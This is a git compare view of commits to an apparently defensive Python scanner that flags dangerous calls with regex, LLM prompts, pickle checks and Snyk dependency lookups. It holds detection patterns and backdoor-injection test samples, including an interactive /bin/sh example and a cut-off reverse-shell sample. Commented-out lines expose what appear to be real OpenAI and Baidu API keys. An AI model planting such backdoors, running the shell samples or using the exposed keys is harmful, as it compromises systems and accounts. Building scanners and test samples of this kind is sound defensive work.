Compare commits
	
		
			11 Commits
		
	
	
		
			a5f7665799
			...
			main
		
	
	| Author | SHA1 | Date | |
|---|---|---|---|
| c3ed3e166e | |||
| f6fa95ba16 | |||
| 94407e71b8 | |||
| 2adb1cbc2e | |||
| 430d2b8f8a | |||
| 752e774714 | |||
| 373defc5bb | |||
| c811e434c6 | |||
| 167bbe0a14 | |||
| e9b1e82492 | |||
| a2651b499e | 
| @@ -1,8 +1,11 @@ | |||||||
| import json | import json | ||||||
| import os | import os | ||||||
|  | import threading | ||||||
|  | import time | ||||||
|  |  | ||||||
| from .utils import * | from .utils import * | ||||||
| import openai | import openai | ||||||
| import signal | # import signal | ||||||
|  |  | ||||||
|  |  | ||||||
| class TimeoutException(Exception): | class TimeoutException(Exception): | ||||||
| @@ -22,10 +25,10 @@ def detectGPT(content: str): | |||||||
|         raise ValueError("env OPENAI_API_KEY no set") |         raise ValueError("env OPENAI_API_KEY no set") | ||||||
|  |  | ||||||
|     # Set alarm timer |     # Set alarm timer | ||||||
|     signal.signal(signal.SIGTERM, timeout_handler) |     # signal.signal(signal.SIGTERM, timeout_handler) | ||||||
|     signal.alarm(10) |     # signal.alarm(10) | ||||||
|  |  | ||||||
|     client = openai.OpenAI(base_url="https://api.xiaoai.plus/v1", api_key=api_key) |     client = openai.OpenAI(base_url="https://api.kpi7.cn/v1", api_key=api_key) | ||||||
|     text = content |     text = content | ||||||
|     # client = openai.OpenAI(api_key="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") #测试用key |     # client = openai.OpenAI(api_key="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") #测试用key | ||||||
|     response = client.chat.completions.create( |     response = client.chat.completions.create( | ||||||
| @@ -34,14 +37,16 @@ def detectGPT(content: str): | |||||||
|                 "role": "system", |                 "role": "system", | ||||||
|                 "content": "You are a Python code reviewer.Read the code below and identify any potential security vulnerabilities. Classify them by risk level (high, medium, low, none). Only report the line number and the risk level.\nYou should output the result as json format in one line. For example: " |                 "content": "You are a Python code reviewer.Read the code below and identify any potential security vulnerabilities. Classify them by risk level (high, medium, low, none). Only report the line number and the risk level.\nYou should output the result as json format in one line. For example: " | ||||||
|                            '[{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnable}"}] Each of these three field is required.\n' |                            '[{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnable}"}] Each of these three field is required.\n' | ||||||
|                            "You are required to only output the json format. Do not output any other information.\n", |                            "You are required to only output the json format. Do not output any other information.请注意:只对有具体危害的代码片段判定为有风险。\n" | ||||||
|  |                            "For examples:\nos.system('ls'),subprocess.call(['ls', '-l']),subprocess.call([\"/bin/sh\",\"-i\"]),eval(code),exec(code) and so on.\n" | ||||||
|  |                            "Please IGNORE the risks that dont matter a lot.", | ||||||
|             }, |             }, | ||||||
|             { |             { | ||||||
|                 "role": "user", |                 "role": "user", | ||||||
|                 "content": text, |                 "content": text, | ||||||
|             }, |             }, | ||||||
|         ], |         ], | ||||||
|         model="gpt-3.5-turbo", |         model="gpt-4o", | ||||||
|     ) |     ) | ||||||
|     try: |     try: | ||||||
|         message_content = response.choices[0].message.content |         message_content = response.choices[0].message.content | ||||||
| @@ -55,8 +60,8 @@ def detectGPT(content: str): | |||||||
|     except TimeoutException: |     except TimeoutException: | ||||||
|         raise TimeoutException("The api call timed out") |         raise TimeoutException("The api call timed out") | ||||||
|  |  | ||||||
|     finally: |     # finally: | ||||||
|         signal.alarm(0) |     #     signal.alarm(0) | ||||||
|  |  | ||||||
|     classified_results = {"high": [], "medium": [], "low": [], "none": []} |     classified_results = {"high": [], "medium": [], "low": [], "none": []} | ||||||
|     for res in res_json: |     for res in res_json: | ||||||
| @@ -67,3 +72,34 @@ def detectGPT(content: str): | |||||||
|         except IndexError: |         except IndexError: | ||||||
|             pass |             pass | ||||||
|     return classified_results |     return classified_results | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def GPTdetectFileList(fileList): | ||||||
|  |     # print(len(fileList)) | ||||||
|  |     results = {"high": [], "medium": [], "low": [], "none": []} | ||||||
|  |     threads = [] | ||||||
|  |     for file in fileList: | ||||||
|  |         content = read_file_content(str(file)) | ||||||
|  |         threads.append(threading.Thread(target=GPTThread, args=(str(file), content, results))) | ||||||
|  |     for thread in threads: | ||||||
|  |         thread.start() | ||||||
|  |         time.sleep(0.1) | ||||||
|  |     for thread in threads: | ||||||
|  |         thread.join() | ||||||
|  |     return results | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def GPTThread(filename, content, results): | ||||||
|  |     try: | ||||||
|  |         res = detectGPT(content) | ||||||
|  |         # print(res) | ||||||
|  |         for key in res: | ||||||
|  |             if key != "none":  # Exclude 'none' risk level | ||||||
|  |                 results[key].extend( | ||||||
|  |                     [ | ||||||
|  |                         (f"{filename}: Line {line_num}", line) | ||||||
|  |                         for line_num, line in res[key] | ||||||
|  |                     ] | ||||||
|  |                 ) | ||||||
|  |     except Exception as e: | ||||||
|  |         print(e) | ||||||
|   | |||||||
| @@ -34,6 +34,7 @@ def find_dangerous_functions( | |||||||
|             r"\bos\.kill\b": "high", |             r"\bos\.kill\b": "high", | ||||||
|             r"\bos\.popen\b": "medium", |             r"\bos\.popen\b": "medium", | ||||||
|             r"\bos\.spawn\b": "medium", |             r"\bos\.spawn\b": "medium", | ||||||
|  |             r"\bsubprocess": "medium", | ||||||
|         }, |         }, | ||||||
|     } |     } | ||||||
|     risk_patterns = patterns.get(file_extension, {}) |     risk_patterns = patterns.get(file_extension, {}) | ||||||
| @@ -43,7 +44,9 @@ def find_dangerous_functions( | |||||||
|             clean_line = remove_comments(line, file_extension) |             clean_line = remove_comments(line, file_extension) | ||||||
|             if not clean_line: |             if not clean_line: | ||||||
|                 continue |                 continue | ||||||
|  |             # 消除换行符,避免影响正则匹配 | ||||||
|  |             clean_line = clean_line.replace("\\n", "") | ||||||
|             for pattern, risk_level in risk_patterns.items(): |             for pattern, risk_level in risk_patterns.items(): | ||||||
|                 if re.search(pattern, clean_line): |                 if re.search(pattern, clean_line, re.MULTILINE | re.DOTALL): | ||||||
|                     classified_results[risk_level].append((line_number, clean_line)) |                     classified_results[risk_level].append((line_number, clean_line)) | ||||||
|     return classified_results |     return classified_results | ||||||
|   | |||||||
| @@ -6,8 +6,12 @@ from reportlab.lib.styles import getSampleStyleSheet | |||||||
| from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate | from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate | ||||||
|  |  | ||||||
| from detection.pickle_detection import pickleDataDetection | from detection.pickle_detection import pickleDataDetection | ||||||
|  |  | ||||||
|  | from .requirements_detection import requirement_detection | ||||||
| from .Regexdetection import find_dangerous_functions | from .Regexdetection import find_dangerous_functions | ||||||
| from .GPTdetection import detectGPT | from .GPTdetection import detectGPT, GPTdetectFileList | ||||||
|  |  | ||||||
|  | # from .cngptdetection import detectGPT,GPTdetectFileList | ||||||
| from .pyc_detection import disassemble_pyc | from .pyc_detection import disassemble_pyc | ||||||
| from .utils import * | from .utils import * | ||||||
| import sys | import sys | ||||||
| @@ -17,7 +21,7 @@ from pathlib import Path | |||||||
|  |  | ||||||
| PYCDC_FLAG = True | PYCDC_FLAG = True | ||||||
| PYCDC_ADDR_FLAG = True | PYCDC_ADDR_FLAG = True | ||||||
| SUPPORTED_EXTENSIONS = {".py", ".js", ".cpp", ".pyc"} | SUPPORTED_EXTENSIONS = {".py", ".js", ".cpp", ".pyc",".pkl",".pickle"} | ||||||
| OUTPUT_FORMATS = ["html", "md", "txt", "pdf"] | OUTPUT_FORMATS = ["html", "md", "txt", "pdf"] | ||||||
| ORDERS = [ | ORDERS = [ | ||||||
|     "__import__", |     "__import__", | ||||||
| @@ -29,6 +33,8 @@ ORDERS = [ | |||||||
|     "__getattribute__", |     "__getattribute__", | ||||||
|     "getattr", |     "getattr", | ||||||
|     "child_process", |     "child_process", | ||||||
|  |     "kill", | ||||||
|  |     "fork", | ||||||
| ] | ] | ||||||
|  |  | ||||||
| # Initialize colorama | # Initialize colorama | ||||||
| @@ -105,8 +111,10 @@ def generate_text_content(results: Dict[str, List[Tuple[int, str]]]) -> str: | |||||||
|  |  | ||||||
|     text_output = "Security Analysis Report\n" |     text_output = "Security Analysis Report\n" | ||||||
|     text_output += "=" * 30 + "\n\n" |     text_output += "=" * 30 + "\n\n" | ||||||
|  |     # text_output+= "chatGPT检测结果:\n\n" | ||||||
|  |  | ||||||
|     for risk_level, entries in results.items(): |     for risk_level, entries in results.items(): | ||||||
|  |         # print(risk_level, entries) | ||||||
|         if risk_level == "pickles": |         if risk_level == "pickles": | ||||||
|             text_output += f"Pickles:\n" |             text_output += f"Pickles:\n" | ||||||
|             for i in entries: |             for i in entries: | ||||||
| @@ -144,8 +152,6 @@ def generate_text_content(results: Dict[str, List[Tuple[int, str]]]) -> str: | |||||||
|                 text_output += line_text |                 text_output += line_text | ||||||
|             text_output += "\n" |             text_output += "\n" | ||||||
|  |  | ||||||
|  |  | ||||||
|  |  | ||||||
|     return text_output |     return text_output | ||||||
|  |  | ||||||
|  |  | ||||||
| @@ -368,9 +374,14 @@ def checkModeAndDetect(mode: str, filePath: str, fileExtension: str, pycdc_addr: | |||||||
|  |  | ||||||
|  |  | ||||||
| def process_path( | def process_path( | ||||||
|     path: str, output_format: str, mode: str, pycdc_addr: str, output_file=None |     path: str, | ||||||
|  |     output_format: str, | ||||||
|  |     mode: str, | ||||||
|  |     pycdc_addr: str, | ||||||
|  |     output_file=None, | ||||||
|  |     requirement_path=None, | ||||||
| ): | ): | ||||||
|     results = {"high": [], "medium": [], "low": [], "none": [],"pickles": []} |     results = {"high": [], "medium": [], "low": [], "none": [], "pickles": []} | ||||||
|     if os.path.isdir(path): |     if os.path.isdir(path): | ||||||
|         # 使用rglob获取所有文件 |         # 使用rglob获取所有文件 | ||||||
|         all_files = [ |         all_files = [ | ||||||
| @@ -378,16 +389,18 @@ def process_path( | |||||||
|             for file_path in Path(path).rglob("*") |             for file_path in Path(path).rglob("*") | ||||||
|             if file_path.suffix in SUPPORTED_EXTENSIONS |             if file_path.suffix in SUPPORTED_EXTENSIONS | ||||||
|         ] |         ] | ||||||
|  |         print(all_files) | ||||||
|  |         if mode == "llm": | ||||||
|  |             results = GPTdetectFileList(all_files) | ||||||
|  |         else: | ||||||
|             # 扫描动画 |             # 扫描动画 | ||||||
|             for file_path in tqdm(all_files, desc="Scanning files", unit="file"): |             for file_path in tqdm(all_files, desc="Scanning files", unit="file"): | ||||||
|                 file_extension = file_path.suffix |                 file_extension = file_path.suffix | ||||||
|  |                 # print(file_extension) | ||||||
|                 if file_extension in [".pkl",".pickle"]: |                 if file_extension in [".pkl",".pickle"]: | ||||||
|  |                     # print("识别到pickle") | ||||||
|                     res = pickleDataDetection(str(file_path), output_file) |                     res = pickleDataDetection(str(file_path), output_file) | ||||||
|                 results["pickles"].append({ |                     results["pickles"].append({"file": str(file_path), "result": res}) | ||||||
|                     "file": str(file_path), |  | ||||||
|                     "result": res |  | ||||||
|                 }) |  | ||||||
|                     continue |                     continue | ||||||
|                 file_results = checkModeAndDetect( |                 file_results = checkModeAndDetect( | ||||||
|                     mode, str(file_path), file_extension, pycdc_addr |                     mode, str(file_path), file_extension, pycdc_addr | ||||||
| @@ -405,10 +418,7 @@ def process_path( | |||||||
|         file_extension = os.path.splitext(path)[1] |         file_extension = os.path.splitext(path)[1] | ||||||
|         if file_extension in [".pkl", ".pickle"]: |         if file_extension in [".pkl", ".pickle"]: | ||||||
|             res = pickleDataDetection(str(path), output_file) |             res = pickleDataDetection(str(path), output_file) | ||||||
|             results["pickles"].append({ |             results["pickles"].append({"file": str(path), "result": res}) | ||||||
|                 "file": str(path), |  | ||||||
|                 "result": res |  | ||||||
|             }) |  | ||||||
|         elif file_extension in SUPPORTED_EXTENSIONS: |         elif file_extension in SUPPORTED_EXTENSIONS: | ||||||
|             file_results = checkModeAndDetect(mode, path, file_extension, pycdc_addr) |             file_results = checkModeAndDetect(mode, path, file_extension, pycdc_addr) | ||||||
|             if file_results is not None: |             if file_results is not None: | ||||||
| @@ -426,7 +436,8 @@ def process_path( | |||||||
|     else: |     else: | ||||||
|         print("Invalid path.") |         print("Invalid path.") | ||||||
|         sys.exit(1) |         sys.exit(1) | ||||||
|  |     if requirement_path is not None: | ||||||
|  |         requirement_detection(requirement_path, output_file) | ||||||
|     output_results(results, output_format, output_file) |     output_results(results, output_format, output_file) | ||||||
|  |  | ||||||
|  |  | ||||||
| @@ -447,6 +458,18 @@ def main(): | |||||||
|         help="Path to pycdc.exe to decompile", |         help="Path to pycdc.exe to decompile", | ||||||
|         default=os.getenv("PATH"), |         default=os.getenv("PATH"), | ||||||
|     ) |     ) | ||||||
|  |     parser.add_argument( | ||||||
|  |         "-P", | ||||||
|  |         "--Pickle", | ||||||
|  |         help="Path to pickle file to analyze", | ||||||
|  |         default=None, | ||||||
|  |     ) | ||||||
|  |     parser.add_argument( | ||||||
|  |         "-r", | ||||||
|  |         "--requirement", | ||||||
|  |         help="Path to requirement file to analyze", | ||||||
|  |         default=None, | ||||||
|  |     ) | ||||||
|     args = parser.parse_args() |     args = parser.parse_args() | ||||||
|     output_format = "txt"  # Default output format |     output_format = "txt"  # Default output format | ||||||
|     output_file = None |     output_file = None | ||||||
| @@ -462,7 +485,9 @@ def main(): | |||||||
|             ) |             ) | ||||||
|             output_file = args.output.rsplit(".", 1)[0] + ".txt" |             output_file = args.output.rsplit(".", 1)[0] + ".txt" | ||||||
|     # 如果未指定输出文件,则输出到 stdout;否则写入文件 |     # 如果未指定输出文件,则输出到 stdout;否则写入文件 | ||||||
|     process_path(args.path, output_format, args.mode, args.pycdc, output_file) |     process_path( | ||||||
|  |         args.path, output_format, args.mode, args.pycdc, output_file, args.requirement | ||||||
|  |     ) | ||||||
|     if PYCDC_FLAG == False: |     if PYCDC_FLAG == False: | ||||||
|         print( |         print( | ||||||
|             "ERROR: Detected Python 3.11 or above .pyc files. You need to install pycdc and compile it yourself to obtain pycdc." |             "ERROR: Detected Python 3.11 or above .pyc files. You need to install pycdc and compile it yourself to obtain pycdc." | ||||||
|   | |||||||
| @@ -1,16 +1,21 @@ | |||||||
| import os | import os | ||||||
|  | import threading | ||||||
|  | import time | ||||||
|  |  | ||||||
| import requests | import requests | ||||||
| import re | import re | ||||||
| import json | import json | ||||||
| from typing import List, Dict, Any | from typing import List, Dict, Any | ||||||
|  |  | ||||||
|  | from detection.utils import read_file_content | ||||||
|  |  | ||||||
|  |  | ||||||
| class TimeoutException(Exception): | class TimeoutException(Exception): | ||||||
|     """自定义异常用于处理超时情况。""" |     """自定义异常用于处理超时情况。""" | ||||||
|     pass |     pass | ||||||
|  |  | ||||||
|  |  | ||||||
| def detectGPT(content: str) -> str: | def detectGPT(content: str,token:str): | ||||||
|     """ |     """ | ||||||
|     检测给定的代码内容中的潜在安全漏洞。 |     检测给定的代码内容中的潜在安全漏洞。 | ||||||
|  |  | ||||||
| @@ -20,15 +25,8 @@ def detectGPT(content: str) -> str: | |||||||
|     返回: |     返回: | ||||||
|     - 分类后的漏洞信息的JSON字符串。 |     - 分类后的漏洞信息的JSON字符串。 | ||||||
|     """ |     """ | ||||||
|     api_key = os.getenv("BAIDU_API_KEY") |  | ||||||
|     secret_key = os.getenv("BAIDU_SECRET_KEY") |  | ||||||
|     #api_key = "DUBWNIrB6QJLOsLkpnEz2ZZa" |  | ||||||
|     #secret_key = "9WK4HIV2n9r1ePPirqD4EQ6Ea33rH1m7" |  | ||||||
|     if not api_key or not secret_key: |  | ||||||
|         raise ValueError("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set") |  | ||||||
|  |  | ||||||
|     url = "https://aip.baidubce.com/rpc/2.0/ai_custom/v1/wenxinworkshop/chat/ernie-4.0-8k-0329?access_token=" + get_access_token( |     url = "https://aip.baidubce.com/rpc/2.0/ai_custom/v1/wenxinworkshop/chat/ernie-4.0-8k-0329?access_token=" + token | ||||||
|         api_key, secret_key) |  | ||||||
|  |  | ||||||
|     payload = json.dumps({ |     payload = json.dumps({ | ||||||
|         "messages": [ |         "messages": [ | ||||||
| @@ -63,6 +61,7 @@ def detectGPT(content: str) -> str: | |||||||
|  |  | ||||||
|     classified_results = {"high": [], "medium": [], "low": [], "none": []} |     classified_results = {"high": [], "medium": [], "low": [], "none": []} | ||||||
|     for res in extracted_data: |     for res in extracted_data: | ||||||
|  |         # print(res) | ||||||
|         try: |         try: | ||||||
|             line_number = int(res["Line"]) |             line_number = int(res["Line"]) | ||||||
|             classified_results[res["Risk"]].append( |             classified_results[res["Risk"]].append( | ||||||
| @@ -71,7 +70,7 @@ def detectGPT(content: str) -> str: | |||||||
|         except (ValueError, IndexError, KeyError): |         except (ValueError, IndexError, KeyError): | ||||||
|             continue |             continue | ||||||
|  |  | ||||||
|     return json.dumps(classified_results, indent=2, ensure_ascii=False) |     return classified_results | ||||||
|  |  | ||||||
|  |  | ||||||
| def get_access_token(api_key: str, secret_key: str) -> str: | def get_access_token(api_key: str, secret_key: str) -> str: | ||||||
| @@ -111,3 +110,40 @@ def extract_json_from_text(text: str) -> List[Dict[str, Any]]: | |||||||
|         return [] |         return [] | ||||||
|  |  | ||||||
|     return data |     return data | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def GPTdetectFileList(fileList): | ||||||
|  |     api_key = os.getenv("BAIDU_API_KEY") | ||||||
|  |     secret_key = os.getenv("BAIDU_SECRET_KEY") | ||||||
|  |     # api_key = "DUBWNIrB6QJLOsLkpnEz2ZZa" | ||||||
|  |     # secret_key = "9WK4HIV2n9r1ePPirqD4EQ6Ea33rH1m7" | ||||||
|  |     if not api_key or not secret_key: | ||||||
|  |         raise ValueError("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set") | ||||||
|  |     # print(len(fileList)) | ||||||
|  |     results = {"high": [], "medium": [], "low": [], "none": []} | ||||||
|  |     threads = [] | ||||||
|  |     token = get_access_token(api_key, secret_key) | ||||||
|  |     # print(token) | ||||||
|  |     for file in fileList: | ||||||
|  |         content = read_file_content(str(file)) | ||||||
|  |         threads.append(threading.Thread(target=GPTThread, args=(str(file), content, results,token))) | ||||||
|  |     for thread in threads: | ||||||
|  |         thread.start() | ||||||
|  |         time.sleep(0.5) | ||||||
|  |     for thread in threads: | ||||||
|  |         thread.join() | ||||||
|  |     return results | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def GPTThread(filename, content, results,token): | ||||||
|  |  | ||||||
|  |         res = detectGPT(content,token) | ||||||
|  |         # print(res) | ||||||
|  |         for key in res: | ||||||
|  |             if key != "none":  # Exclude 'none' risk level | ||||||
|  |                 results[key].extend( | ||||||
|  |                     [ | ||||||
|  |                         (f"{filename}: Line {line_num}", line) | ||||||
|  |                         for line_num, line in res[key] | ||||||
|  |                     ] | ||||||
|  |                 ) | ||||||
|   | |||||||
| @@ -3,6 +3,16 @@ import requests | |||||||
| from bs4 import BeautifulSoup | from bs4 import BeautifulSoup | ||||||
| from packaging.version import Version, InvalidVersion | from packaging.version import Version, InvalidVersion | ||||||
| import sys | import sys | ||||||
|  | from reportlab.lib.pagesizes import letter | ||||||
|  | from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle | ||||||
|  | from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer | ||||||
|  | from colorama import Fore, Style, init | ||||||
|  | from tqdm import tqdm | ||||||
|  | import html | ||||||
|  | import os | ||||||
|  |  | ||||||
|  |  | ||||||
|  | init(autoreset=True)  # 初始化colorama,并在每次打印后自动重置颜色 | ||||||
|  |  | ||||||
|  |  | ||||||
| def fetch_html(url: str) -> str: | def fetch_html(url: str) -> str: | ||||||
| @@ -55,7 +65,6 @@ def version_in_range(version, range_str: str) -> bool: | |||||||
|         except InvalidVersion: |         except InvalidVersion: | ||||||
|             return False |             return False | ||||||
|     else: |     else: | ||||||
|         # 如果没有给版本号,默认使用最新版本 |  | ||||||
|         if range_str[-2] == ",": |         if range_str[-2] == ",": | ||||||
|             return True |             return True | ||||||
|  |  | ||||||
| @@ -77,22 +86,18 @@ def version_in_range(version, range_str: str) -> bool: | |||||||
|     return True |     return True | ||||||
|  |  | ||||||
|  |  | ||||||
| def check_vulnerabilities(requirements: list, base_url: str, output_file: str): | def check_vulnerabilities(requirements: list, base_url: str) -> str: | ||||||
|     with open(output_file, "w") as out_file: |     results = [] | ||||||
|         for req in requirements: |     for req in tqdm(requirements, desc="Checking vulnerabilities", unit="dependency"): | ||||||
|         version = "" |         version = "" | ||||||
|             # 如果有版本 |  | ||||||
|         if "==" in req: |         if "==" in req: | ||||||
|             package_name, version = req.split("==") |             package_name, version = req.split("==") | ||||||
|             # 没有版本 |  | ||||||
|         else: |         else: | ||||||
|             package_name, version = req, None |             package_name, version = req, None | ||||||
|             # 拼接URL |  | ||||||
|         url = f"{base_url}{package_name}" |         url = f"{base_url}{package_name}" | ||||||
|             print(f"Fetching data for {package_name} from {url}") |         # print(f"\nFetching data for {package_name} from {url}") | ||||||
|         html_content = fetch_html(url) |         html_content = fetch_html(url) | ||||||
|         if html_content: |         if html_content: | ||||||
|                 # 解析hmtl |  | ||||||
|             extracted_data = parse_html(html_content) |             extracted_data = parse_html(html_content) | ||||||
|             if extracted_data: |             if extracted_data: | ||||||
|                 relevant_vulns = [] |                 relevant_vulns = [] | ||||||
| @@ -100,41 +105,164 @@ def check_vulnerabilities(requirements: list, base_url: str, output_file: str): | |||||||
|                     if version_in_range(version, vuln["chip"]): |                     if version_in_range(version, vuln["chip"]): | ||||||
|                         relevant_vulns.append(vuln) |                         relevant_vulns.append(vuln) | ||||||
|                 if relevant_vulns: |                 if relevant_vulns: | ||||||
|                         out_file.write(f"Vulnerabilities found for {package_name}:\n") |                     result = f"Vulnerabilities found for {package_name}:\n" | ||||||
|                     for vuln in relevant_vulns: |                     for vuln in relevant_vulns: | ||||||
|                             out_file.write(f"  - {vuln['link']}\n") |                         result += f"  - {vuln['link']}\n" | ||||||
|                         out_file.write("\n") |                     results.append(result) | ||||||
|  |     return "\n".join(results) | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def save_to_file(output_path: str, data: str): | ||||||
|  |     if output_path.endswith(".html"): | ||||||
|  |         save_as_html(output_path, data) | ||||||
|  |     elif output_path.endswith(".pdf"): | ||||||
|  |         save_as_pdf(output_path, data) | ||||||
|  |     elif output_path.endswith(".md"): | ||||||
|  |         save_as_markdown(output_path, data) | ||||||
|     else: |     else: | ||||||
|                     print(f"No relevant data found for {package_name}.") |         save_as_txt(output_path, data) | ||||||
|             else: |  | ||||||
|                 print(f"Failed to fetch data for {package_name}.") |  | ||||||
|  |  | ||||||
|  |  | ||||||
| def main(): | def save_as_html(output_path: str, data: str): | ||||||
|     parser = argparse.ArgumentParser( |     escaped_data = html.escape(data) | ||||||
|         description="Check project dependencies for vulnerabilities." |     html_content = f""" | ||||||
|     ) |     <html> | ||||||
|     parser.add_argument( |     <head> | ||||||
|         "-r", |         <meta charset="UTF-8"> | ||||||
|         "--requirement", |         <meta name="viewport" content="width=device-width, initial-scale=1.0"> | ||||||
|         help="Path to the requirements file of the project", |         <link rel="icon" href="https://s2.loli.net/2024/05/30/WDc6MekjbuCU9Qo.png"> | ||||||
|         required=True, |         <title>Vulnerability Report</title> | ||||||
|     ) |         <style> | ||||||
|     parser.add_argument( |             body {{ | ||||||
|         "-o", |                 font-family: Arial, sans-serif; | ||||||
|         "--output", |                 background-image: url('https://s2.loli.net/2024/05/30/85Mv7leB2IRWNp6.jpg'); | ||||||
|         help="Output file path with extension, e.g., './output/report.txt'", |                 background-size: cover; | ||||||
|         required=True, |                 color: #333; | ||||||
|     ) |                 margin: 0; | ||||||
|     args = parser.parse_args() |                 padding: 0; | ||||||
|  |                 display: flex; | ||||||
|  |                 justify-content: center; | ||||||
|  |                 align-items: center; | ||||||
|  |                 height: 100vh; | ||||||
|  |             }} | ||||||
|  |             .container {{ | ||||||
|  |                 background: rgba(255, 255, 255, 0.8); | ||||||
|  |                 border-radius: 10px; | ||||||
|  |                 padding: 20px; | ||||||
|  |                 box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); | ||||||
|  |                 max-width: 800px; | ||||||
|  |                 width: 100%; | ||||||
|  |                 margin: 20px; | ||||||
|  |                 overflow-y: auto; | ||||||
|  |                 max-height: 90vh; | ||||||
|  |             }} | ||||||
|  |             .title {{ | ||||||
|  |                 font-size: 24px; | ||||||
|  |                 font-weight: bold; | ||||||
|  |                 text-align: center; | ||||||
|  |                 margin-bottom: 20px; | ||||||
|  |             }} | ||||||
|  |             pre {{ | ||||||
|  |                 white-space: pre-wrap; | ||||||
|  |                 word-wrap: break-word; | ||||||
|  |                 font-size: 14px; | ||||||
|  |                 line-height: 1.5; | ||||||
|  |                 color: #333; | ||||||
|  |                 background: #f4f4f4; | ||||||
|  |                 padding: 10px; | ||||||
|  |                 border-radius: 5px; | ||||||
|  |                 border: 1px solid #ddd; | ||||||
|  |                 overflow: auto; | ||||||
|  |                 font-weight: bold; | ||||||
|  |             }} | ||||||
|  |         </style> | ||||||
|  |     </head> | ||||||
|  |     <body> | ||||||
|  |         <div class="container"> | ||||||
|  |             <div class="title">Vulnerability Report</div> | ||||||
|  |             <pre>{escaped_data}</pre> | ||||||
|  |         </div> | ||||||
|  |     </body> | ||||||
|  |     </html> | ||||||
|  |     """ | ||||||
|  |     with open(output_path, "w", encoding="utf-8") as file: | ||||||
|  |         file.write(html_content) | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def save_as_pdf(output_path: str, data: str): | ||||||
|  |     doc = SimpleDocTemplate(output_path, pagesize=letter) | ||||||
|  |     story = [] | ||||||
|  |     styles = getSampleStyleSheet() | ||||||
|  |  | ||||||
|  |     # Add the title centered | ||||||
|  |     title_style = ParagraphStyle( | ||||||
|  |         "Title", | ||||||
|  |         parent=styles["Title"], | ||||||
|  |         alignment=1,  # Center alignment | ||||||
|  |         fontSize=24, | ||||||
|  |         leading=28, | ||||||
|  |         spaceAfter=20, | ||||||
|  |         fontName="Helvetica-Bold", | ||||||
|  |     ) | ||||||
|  |     title = Paragraph("Vulnerability Report", title_style) | ||||||
|  |     story.append(title) | ||||||
|  |  | ||||||
|  |     # Normal body text style | ||||||
|  |     normal_style = ParagraphStyle( | ||||||
|  |         "BodyText", parent=styles["BodyText"], fontSize=12, leading=15, spaceAfter=12 | ||||||
|  |     ) | ||||||
|  |  | ||||||
|  |     # Add the vulnerability details | ||||||
|  |     for line in data.split("\n"): | ||||||
|  |         if line.strip():  # Skip empty lines | ||||||
|  |             story.append(Paragraph(line, normal_style)) | ||||||
|  |  | ||||||
|  |     doc.build(story) | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def save_as_markdown(output_path: str, data: str): | ||||||
|  |     with open(output_path, "w") as file: | ||||||
|  |         file.write("## Vulnerability Report: \n\n") | ||||||
|  |         file.write(data) | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def save_as_txt(output_path: str, data: str): | ||||||
|  |     with open(output_path, "w") as file: | ||||||
|  |         file.write("Vulnerability Report: \n\n") | ||||||
|  |         file.write(data) | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def print_separator(title, char="-", length=50, padding=2): | ||||||
|  |     print(f"{title:^{length + 4*padding}}")  # 居中打印标题,两侧各有padding个空格 | ||||||
|  |     print(char * (length + 2 * padding))  # 打印分割线,两侧各有padding个字符的空格 | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def modify_file_name(file_path: str) -> str: | ||||||
|  |     """ | ||||||
|  |     Modify the file name by adding '-re' before the file extension. | ||||||
|  |  | ||||||
|  |     Args: | ||||||
|  |         file_path (str): The original file path. | ||||||
|  |  | ||||||
|  |     Returns: | ||||||
|  |         str: The modified file path. | ||||||
|  |     """ | ||||||
|  |     directory, file_name = os.path.split(file_path) | ||||||
|  |     name, ext = os.path.splitext(file_name) | ||||||
|  |     new_file_name = f"{name}-re{ext}" | ||||||
|  |     new_file_path = os.path.join(directory, new_file_name) | ||||||
|  |     return new_file_path | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def requirement_detection(requirement_path, output_path=None): | ||||||
|     base_url = "https://security.snyk.io/package/pip/" |     base_url = "https://security.snyk.io/package/pip/" | ||||||
|     # 分析项目依赖,包括名称和版本(如果有的话) |     requirements = load_requirements(requirement_path) | ||||||
|     requirements = load_requirements(args.requirement) |     results = check_vulnerabilities(requirements, base_url) | ||||||
|     # 传入依赖信息,url前缀,扫描结果输出位置 |     if output_path is not None: | ||||||
|     check_vulnerabilities(requirements, base_url, args.output) |         new_path = modify_file_name(output_path) | ||||||
|     print("Vulnerability scan complete. Results saved to", args.output) |         save_to_file(new_path, results) | ||||||
|  |         print(f"Vulnerability scan complete. Results saved to {output_path}") | ||||||
|  |         print(f"Requirements scan complete. Results saved to {new_path}") | ||||||
| if __name__ == "__main__": |     else: | ||||||
|     main() |         print_separator("\nVulnerability Report", "=", 40, 5) | ||||||
|  |         print(results) | ||||||
|   | |||||||
| @@ -63,69 +63,39 @@ def inject_random_backdoor( | |||||||
|  |  | ||||||
|  |  | ||||||
| # 示例1: 通过 os.system 执行命令 | # 示例1: 通过 os.system 执行命令 | ||||||
| backdoor1 = """ | backdoor1 = """import os | ||||||
| import os | os.system('ls')""" | ||||||
| os.system('ls') |  | ||||||
| """ |  | ||||||
|  |  | ||||||
| # 示例2: 通过 subprocess 模块执行命令 | # 示例2: 通过 subprocess 模块执行命令 | ||||||
| backdoor2 = """ | backdoor2 = """import subprocess | ||||||
| import subprocess | subprocess.call(['ls', '-l'])""" | ||||||
| subprocess.call(['ls', '-l']) |  | ||||||
| """ |  | ||||||
|  |  | ||||||
| # 示例3: 打开一个反向 shell | # 示例3: 打开一个反向 shell | ||||||
